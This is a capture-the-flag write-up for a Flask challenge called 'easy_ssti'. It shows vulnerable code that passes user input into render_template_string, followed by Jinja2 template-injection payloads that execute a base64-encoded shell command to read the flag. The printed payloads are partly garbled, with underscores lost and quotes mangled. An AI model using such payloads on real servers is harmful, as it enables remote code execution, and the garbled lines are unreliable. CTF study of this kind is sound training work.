easy_ssti 100 (Fool's Cup)

Language 2023-12-17 21:22:38 views: null

easy_ssti 100 (Fool's Cup)

By viewing the source code, you can see the prompt app.zip
Download the source code, open it and find that it is a python flaskweb framework

from flask import Flask
from flask import render_template_string,render_template
app = Flask(__name__)

@app.route('/hello/')
def hello(name=None):
    return render_template('hello.html',name=name)
@app.route('/hello/<name>')
def hellodear(name):
    if "ge" in name:
        return render_template_string('hello %s' % name)
    elif "f" not in name:
        return render_template_string('hello %s' % name)
    else:
        return 'Nonononon'

No filtering
Test:
Insert image description here

payload:
{ {().class.mro[-1].subclasses()[132].init.globals’popen’.read()}}

{ {().class.mro[-1].subclasses()[132].init.globals[‘popen’](‘echo “Y2F0IC9mbGFn”|base64 -d|sh’).read()}}Insert image description here

Guess you like

Origin blog.csdn.net/m0_73728268/article/details/130311730
Recommended
Ranking
Enter the root node and an integer of a binary tree, and print out all paths where the sum of the node values in the binary tree is the input integer. Pop explanation in.
HTTP, HTTPS, FTP und TCP im Detail erklärt: die Funktionen und Eigenschaften der Protokolle
[Study notes] Berlekamp-Massey
Some insights as a junior front-end developer
[linux command] echo command and usage tips
Verilig-- state machine
Knowing the center point coordinates, angle, half length, and half width of Retangle2, calculate the four vertex coordinates and the midpoint coordinates of the four line segments
【uniapp】Google Maps
Unity uses Camera to make a small map display, and players can reach any location by clicking the small map
algorithmic analysis
Daily
More
2024-07-22(0)
2024-07-21(0)
2024-07-20(0)
2024-07-19(0)
2024-07-18(0)
2024-07-17(0)
2024-07-16(0)
2024-07-15(0)
2024-07-14(0)
2024-07-13(0)

Code World

© 2018 codetd.com